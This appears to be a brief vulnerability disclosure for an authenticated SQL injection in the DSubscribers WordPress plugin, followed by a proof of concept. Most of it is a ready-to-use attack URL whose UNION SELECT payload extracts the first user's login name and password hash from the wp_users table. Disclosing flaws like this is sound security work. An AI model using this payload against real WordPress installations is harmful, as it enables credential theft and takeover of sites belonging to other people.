The DSubscribers WordPress plugin was affected by an Authenticated SQL Injection security vulnerability.
Proof of Concept:
1 – Login with admin user:
2 – Url attack:
http://target/wp-admin/admin.php?page=dsubscribers&action=edit&dsubscribers=0 UNION SELECT 1,2,CONCAT(user_login,char(58),user_pass) FROM wp_users WHERE ID=1